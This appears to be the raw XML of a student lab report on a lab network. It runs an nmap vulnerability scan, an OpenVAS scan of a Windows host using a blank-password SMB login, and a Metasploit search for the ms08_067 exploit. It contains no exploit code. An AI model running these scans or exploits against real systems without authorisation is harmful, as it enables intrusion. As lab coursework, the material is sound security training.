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7A94B2" w14:textId="77777777" w:rsidR="00C651C2" w:rsidRDefault="00C651C2" w:rsidP="00C651C2">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BA7566C" w14:textId="77777777" w:rsidR="00C651C2" w:rsidRDefault="00C651C2" w:rsidP="00C651C2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Map the Network using NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAB13F9" w14:textId="77777777" w:rsidR="00C651C2" w:rsidRDefault="00C651C2" w:rsidP="00C651C2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Nmap command: nmap –O –sS –SV –version-intensity 5 –A –script=”default</w:t>
      </w:r>
      <w:r w:rsidR="001C4F3B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>, vuln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">” –p 1-65535 10.10.111.0/24 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172A0DC7" w14:textId="77777777" w:rsidR="00A264E4" w:rsidRDefault="00A264E4" w:rsidP="00C651C2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435F485C" w14:textId="77777777" w:rsidR="00A264E4" w:rsidRPr="00C651C2" w:rsidRDefault="00A264E4" w:rsidP="00C651C2">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>This command shows all the open ports, the OS on each host, and potential vulnerabilities. Screenshots attached and can be found below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3967CCAF" w14:textId="77777777" w:rsidR="001100A3" w:rsidRDefault="00D21215">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D21215">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E60173D" wp14:editId="57684D4F">
            <wp:extent cx="5943600" cy="4294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388E" w14:textId="77777777" w:rsidR="00A264E4" w:rsidRDefault="00A264E4"/>
    <w:p w14:paraId="566B5205" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="6E36787C" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="3AB911C0" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="68EAD162" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="136F8641" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="387E2370" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="5A223F86" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="6EEBEE97" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="6C2CFACF" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="149EBD08" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="28C689B0" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="639CFE1A" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="18CD0B22" w14:textId="0D30C91B" w:rsidR="00563E8D" w:rsidRPr="00563E8D" w:rsidRDefault="00563E8D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Continuation of screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9A7767" w14:textId="77777777" w:rsidR="00A264E4" w:rsidRDefault="00D21215">
      <w:r w:rsidRPr="00D21215">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="576ABAD8" wp14:editId="348EE6EE">
            <wp:extent cx="5943600" cy="445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7FC2" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215"/>
    <w:p w14:paraId="239FDBAA" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="46BACDD7" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="07779D15" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="12D1D84B" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="1763686D" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="5BA9D365" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="1D1FB391" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="64388E67" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="68BBDF41" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="0A70B8A7" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="216891B2" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="43AA27E4" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="71C92194" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="4C1A1D1B" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="20DB75D8" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="1E449B90" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="4910B0B7" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="2058284F" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="710F31A4" w14:textId="6EF063B3" w:rsidR="00563E8D" w:rsidRPr="00563E8D" w:rsidRDefault="00563E8D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Continuation of Screenshot: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A93169" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215">
      <w:r w:rsidRPr="00D21215">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="693E18F7" wp14:editId="0E50BA23">
            <wp:extent cx="5943600" cy="4389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4D67" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215"/>
    <w:p w14:paraId="172DC570" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="51FC1375" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="4E834B11" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="1DE3A3AB" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="410A9E74" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="4F6D9EFB" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="3B78F107" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="29C37E53" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="4BD1F564" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="50BFE2DB" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="6C6ECA1E" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="714CC394" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="28F7E726" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="496B6350" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="37CDCAFB" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="6CF0CDA2" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="6D0DA082" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="3ED3815B" w14:textId="77777777" w:rsidR="00563E8D" w:rsidRDefault="00563E8D"/>
    <w:p w14:paraId="531649B6" w14:textId="1916BA2A" w:rsidR="00563E8D" w:rsidRPr="00563E8D" w:rsidRDefault="00563E8D">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Continuation of screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7B5477" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215">
      <w:r w:rsidRPr="00D21215">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A019499" wp14:editId="39AEA127">
            <wp:extent cx="5943600" cy="4493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3038" w14:textId="77777777" w:rsidR="00A264E4" w:rsidRDefault="00A264E4"/>
    <w:p w14:paraId="389AD020" w14:textId="77777777" w:rsidR="00A264E4" w:rsidRDefault="00A264E4"/>
    <w:p w14:paraId="262F382A" w14:textId="77777777" w:rsidR="00A264E4" w:rsidRDefault="00A264E4"/>
    <w:p w14:paraId="7C8A633E" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215"/>
    <w:p w14:paraId="640E465F" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215"/>
    <w:p w14:paraId="12AE864D" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215"/>
    <w:p w14:paraId="4C62FF01" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="0CDDAAB3" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="2EEA46A2" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="6CA471C4" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="7BAD5FE4" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="4544990D" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="73B05EDD" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="503427A4" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="7BE19305" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="17D21BDB" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="72836FE8" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="3768FED5" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0"/>
    <w:p w14:paraId="52050C6A" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215"/>
    <w:p w14:paraId="26BA32F3" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215"/>
    <w:p w14:paraId="50415218" w14:textId="77777777" w:rsidR="00D21215" w:rsidRDefault="00D21215" w:rsidP="00D2121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OPENVAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F736EF" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0" w:rsidP="001B60B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B037552" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0" w:rsidP="001B60B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>I set the Target IP as the Window’s IP (10.10.111.101). I checked all of the TCP Ports , and set the SMB username as poly and password [blank] as shown before.  The rest was left as defaults for the scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB8A66D" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0" w:rsidP="001B60B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD5830E" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRDefault="001B60B0" w:rsidP="001B60B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561199A9" w14:textId="77777777" w:rsidR="001B60B0" w:rsidRPr="001B60B0" w:rsidRDefault="001B60B0" w:rsidP="001B60B0">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C40BFAF" w14:textId="77777777" w:rsidR="003C23C9" w:rsidRDefault="003C23C9" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C23C9">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B691A66" wp14:editId="0A26B4F7">
            <wp:extent cx="5943600" cy="3846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8DDD" w14:textId="77777777" w:rsidR="00723446" w:rsidRDefault="00723446" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00723446">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09F92F97" wp14:editId="37A36EC0">
            <wp:extent cx="5943600" cy="4017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59" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04499FE3" w14:textId="5F6062D8" w:rsidR="00C91D1D" w:rsidRPr="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Creating a new Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257D49B4" w14:textId="77777777" w:rsidR="00652FF5" w:rsidRDefault="00652FF5" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00652FF5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13DC8CC0" wp14:editId="0F1062CB">
            <wp:extent cx="5943600" cy="353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3FE1" w14:textId="77777777" w:rsidR="00C93F49" w:rsidRDefault="00C93F49" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FBCE711" w14:textId="5CF92E8C" w:rsidR="00C91D1D" w:rsidRPr="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>My target used, IP of 10.10.111.101 with the SMB username as poly and no password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437C6B23" w14:textId="29DAF9D6" w:rsidR="00614040" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00771B88">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50AF46E1" wp14:editId="03034B86">
            <wp:extent cx="5943600" cy="28092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939D" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45DAD74F" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1726F3BC" w14:textId="7782D367" w:rsidR="00614040" w:rsidRPr="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Setting the SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C613ADA" w14:textId="77777777" w:rsidR="00C93F49" w:rsidRDefault="00C93F49" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C93F49">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD6EA70" wp14:editId="62EC95D7">
            <wp:extent cx="5943600" cy="39014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A8F1" w14:textId="487DC545" w:rsidR="00771B88" w:rsidRDefault="00771B88" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452D0708" w14:textId="77777777" w:rsidR="00377014" w:rsidRDefault="00377014" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34685396" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215B7B1C" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8E9DF0" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="734DE5F0" w14:textId="0E7B1BA8" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Report of the Results: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B73A3CE" w14:textId="77777777" w:rsidR="00377014" w:rsidRDefault="00377014" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00377014">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E2D827F" wp14:editId="02F40D98">
            <wp:extent cx="5943600" cy="2557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F9D2" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D0F7661" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="453D4234" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A218BFF" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54049DF0" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="502BD408" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C721A90" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0071D01F" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2949E584" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F6D1E6" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21DF1479" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="062132BA" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A3AD59" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C3E1221" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="144A2F3E" w14:textId="77777777" w:rsidR="00FC593C" w:rsidRDefault="00FC593C" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E0AC10" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D35A5D8" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E284CFA" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1DCFE3" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BD12BB" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D844C8D" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6779950A" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E578CFB" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FC845B0" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012635E0" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31ED8A0C" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00D5C6A1" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2431CC6B" w14:textId="77777777" w:rsidR="00C91D1D" w:rsidRDefault="00C91D1D" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4D5887" w14:textId="1B2F9224" w:rsidR="00987C5A" w:rsidRPr="00987C5A" w:rsidRDefault="00987C5A" w:rsidP="00987C5A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Opening the metasploit console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49FFB3" w14:textId="77777777" w:rsidR="00987C5A" w:rsidRDefault="00987C5A" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B146EA2" w14:textId="48484A9D" w:rsidR="00FC593C" w:rsidRDefault="00505C40" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00505C40">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18633697" wp14:editId="265481B5">
            <wp:extent cx="4372916" cy="3175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6116" cy="31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9B3C" w14:textId="77777777" w:rsidR="00987C5A" w:rsidRDefault="00987C5A" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A7944D2" w14:textId="257BF05D" w:rsidR="00987C5A" w:rsidRDefault="00987C5A" w:rsidP="003C23C9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Looking for the exploit that the lab in part 1 suggests.</w:t>
      </w:r>
      <w:r w:rsidR="00C91D1D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (search ms08_067)</w:t>
      </w:r>
    </w:p>
